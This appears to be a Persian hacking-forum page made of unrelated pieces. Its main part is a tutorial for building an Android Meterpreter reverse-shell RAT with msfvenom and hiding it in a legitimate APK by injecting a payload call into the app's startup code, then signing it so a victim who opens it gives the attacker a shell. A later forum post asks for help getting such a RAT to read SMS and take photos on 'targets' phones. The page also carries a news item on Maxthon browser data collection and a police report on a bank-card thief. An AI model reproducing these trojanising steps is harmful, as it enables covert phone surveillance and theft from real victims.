آشیان امروز

با سلام دوستان امروز می خواستم اموزش متنی ساخت رات با متاسپلویت و پنهان سازی ان در apk دیگر رو بهتون بدم

خب نرم افزارایی که نیاز داریم :
1-metasploit framework
2-apktool 2.1.1 (recommended)
3-signapk

نوبت به ساخت رات میرسه :

1- ترمینال را باز کرده

2-دستور زیر را وارد کنید :
msfvenom -p android/meterpreter/reverse_tcp LHOST=[your ip] LPORT=[your port] R>[mahal zakhire]rat.apk

خب حالا باید متاسپلویت رو راه بندازیم بر اساس این کانفیگ ها:

ترمینالی جدید ایجاد کرده و دستورات زیر را وارد کنید:
1-msfconsole
2-use multi/handler
3-set LHOST [your ip]
4- set LPORT [your port]
5-set PAYLOAD android/meterpreter/reverse_tcp
6-exploit
اینم از متاسپلویت
خبحالا نوبت بایند کردن میرسه
اول از همه باید rat و فایل apk عادی رو deassemble کنیم:
ترمینالی جدید باز کرده و این دستورات رو بزنین :
1- apktool d [mahal rat]rat.apk -o [mahal folder zakhire sazi]rat
2-apktool d [mahal apk]ye chizi.apk -o [mahal zakhire sazi apk]ye chizi
خب الان هر 2 دی اسمبل شدن
کار بعدی :
1- در فولدری که حاوی محتوای دی اسمبل شده ی رات هست وارد شوید و به smali رفته و com را باز کنید و فولدر متاسپلویت رو کپی کنید
و بعد به فولدر حاوی محتوای دی اسمبل شده ی apk عادی رفته و smali را باز کردی و در داخل فولدر com paste کنید
2-فولدر apk عادی رو باز کنید( حاوی دی اسمبل) و androidmainfest.xml را با notepad++ باز کنید و به دنبال android.intent.action.main بگردید و داخل activity که ان را پوشش می دهد به دنبال android:name بگردید و چیزی که جلوی ان و بین دو " قرار گرفته را یه جا ذخیره کنید.
متنی که بین دو " بود همچین شکلی دارد : felan.bahman.bisar.yechizi
خب شما باید در smali بدنبال فولدر felan و بعد داخل ان به دنبال bahman و بعد دوباره داخل ان بدنبال bisar و وقتی به یکی مونده به اخریش رسیدید yechizi.smali رو باید با notepad++ باز کنید
خب حالا در yechizi.smali باید به دنبال:
onCreate(Landroid/os/BundleV
بگردید و زیر ان این را کپی کنید:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/ContextV

خب حالا باید همون androidMainfest.xml (برای apk عادی) رو باز کنیم و androidMainfest.xml برای رات رو هم از درون فولدرش باز کنیم و از داخل androidMainfest.xml برای رات همه تگ های user-permission رو
کپی در androidMainfest.xml نرم افزار عادی بکنیم.
همه چیز رو سیو می کنیم و نوبت میرسه به assemble کردن
وارد ترمینال میشیم و دستور زیر رو می نویسیم:
apktool b [folderi ke narm afzar adi bood] -o [ye makani]bindedrat.apk
خب الان اینتر رو می زنیم و منتظر میشیم که assemble کنه
زمانی که اسمبل کرد اخرین مرحله است که باید با signapk برنامه رو sign کنیم
دستور sign کردن :
java -jar signapk.jar [file daraye .pem] [file key] [makan apk sign nashode]bindedrat.apk [makan delkhah]signeddbindedrat.apk
خب اینم از امضا شده شد حالا اگه قربانی باز بکنه اینو ، باید ترمینالی که در ان metasploit رو بارگذاری کردیم مشاهده کنیم و برای ما shell درست می کند

اووووف چقد طول کشید ایشالا که کمکتون کرده باشه و لذت ببرید سوالی داشتین بگین در خدمتم.

پیشنهاد می کنیم از مرورگر چینی به نام "Maxthon" استفاده نکنید چرا که خیلی مخفیانه همه اطلاعاتتان را به سرقت می برد.

Maxthon یک مرورگر قدرتمند و زیبای چینی است که تاکنون دو شرکت امنیتی تایید کرده اند که این مرورگر، اطلاعات مهم و حساس کاربران خود را جمع آوری کرده و آن ها برای برای سرورهای خود ارسال می کند.

این عمل در شرایطی انجام می شود که کاربران از چنین موضوعی کاملا بی اطلاع هستند و حتی اگر با چنین اقدامی مخالف باشند این مرورگر خودسرانه این کار را انجام می دهد.

طبق گزارشات رسیده از Exatel و Fidelis Cybersecurity این موضوع یعنی همان جمع آوری اطلاعات کاربران، در برنامه ارتقاء رضایت کاربران (UEIP) وجود دارد. UEIP ویژگی است که در مرورگر Maxthon گنجانده شده است. در واقع UEIP به شرکت های سازنده مرورگر اجازه خواهد داد تا اطلاعات آماری درباره چگونگی ارتباط کاربران با محصولشان جمع آوری کنند. البته این کار توسط تمام مرورگرها، حتی مرورگرهایی همچون فایرفاکس و کروم نیز صورت می گیرد؛ اما تا حد مجاز.

نکته بسیار قابل توجه این است که محققان اعلام کرده اند فایل رمزگذاری شده ای به نام dat.txt در داخل این فایل زیپ وجود داشت. این فایل که در واقع از مجموعه ای از کدها تشکیل شده است، توانسته با استفاده از عبارت eu3o4[r04cml4eir که در مرورگر Maxthon نهفته است، سیستم رمزگذاری را بشکند. گفتنی است ؛ فایل Dat.txt شامل تمام اطلاعات سیستم کاربر بوده است.

منبع: باشگاه خبرنگاران

درود...

دوستان من پورت 1337 رو باز کردم...

No Ip جدید ساختم و DUC رو اجرا کردم و پورت رو چک کردم باز بود !

بعد برای تست روی بلواستکس اجرا کردم تقریبا بدون مشکل کار میکرد ! نسخه 4.4 Cracked

بعد ریختم روی گوشی خودم ، اجراش کردم ، اما هیچکدوم از دستورات اجرا نمیشه ، همینجوری باید منتظر بمونم ولی هیچ اتفاقی نمیوفته..

نمیدونم مشکل از کجاس ، اما همینجوری توی حالت Please Wait میمونه..

توی خوندن اس ام اس ها و گرفتن عکس این مشکل وجود داره...

من توی گوشی سامسونگ تست کردم اما تارگت های من اکثرا از هواوی استفاده میکنن بدون آنتی ویروس...

نمیدونم مشکل از کجاس هرچقدر هم منتظر میمونم کار انجام نمیشه...

ممنون میشم کمک کنید...

فرمانده انتظامی میاندوآب گفت: در یک عملیات پلیسی، هکر 20 ساله ای که اطلاعات حساب های بانکی 400 نفر را در کل کشور از طریق مجازی به سرقت برده و اقدام به خرید اینترنتی می کرد، دستگیر شد.

سرهنگ حسن شیخ نژاد اظهار کرد: برابر شکایات مردمی رسیده به پلیس فتای میاندوآب مبنی بر برداشت اینترنتی غیرمجاز از حساب های بانکی که بعد از خرید اینترنتی توسط خودشان و بدون اطلاع آنها صورت گرفته است، موضوع در دستور کار پلیس قرار گرفت.

فرمانده انتظامی میاندوآب افزود: به دنبال کسب این اخبار، ماموران پلیس فتای شهرستان اقدامات گسترده ای را برای شناسایی سارق یا سارقان انجام داده و با تحقیقات و بررسی های گسترده پلیسی، یک فرد 20 ساله در شهرستان لاهیجان که به صورت غیرمجاز از درگاه های بانکی اینترنتی استفاده می کرد، شناسایی شد.

وی گفت: پس از شناسایی این فرد و با هماهنگی های قضایی صورت گرفته، این فرد توسط ماموران انتظامی شهرستان دستگیر و به میاندوآب منتقل شد.

شیخ نژاد با بیان اینکه این هکر اینترنتی در بازجویی اولیه به سرقت رمز عبور و شماره کارت 400 نفر از دارندگان کارت های بانکی اعتراف کرده است، تصریح کرد: این فرد بعد از سرقت رمز و شماره کارت مشتریان در هنگام خرید اینترنتی، نسبت به خرید مجازی با استفاده از آنها اقدام می کرد.

فرمانده انتظامی میاندوآب افزود: این فرد در دو ماه گذشته حدود یک میلیارد و 50 میلیون ریـال از حساب های بانکی مردم برداشت کرده که روند شناسایی افرادی که از حساب های بانکی آنها برداشت شده، هم اکنون نیز ادامه داشته و احتمال افزایش افراد شاکی و مقدار وجه سرقتی نیز وجود دارد.

وی با بیان اینکه از هموطنان عزیز در اقصی نقاط کشور که با موارد مشابه برخورد می کنند، سریعا موضوع را با پلیس درمیان بگذارند، گفت: متهم پس از اعتراف و تشکیل پرونده مقدماتی برای سیر مراحل بعدی تحویل مقامات قضایی شد.

شیخ نژاد با توصیه به رعایت نکات ایمنی لازم در هنگام استفاده از کارت های عابر بانک و یا مراجعه به بانک ها، اظهار کرد: شهروندان ضمن رعایت نکات حفاظتی، از در اختیار گذاشتن رمز کارت خود در اختیار افراد نامطئن خودداری کرده و در هنگام خرید اینترنتی حتما از درگاه هایی استفاده کنند که جعلی نبوده و نیز از صفحه کلید مجازی استفاده کنند.

منبع: شبکه اطلاع رسانی راه دانا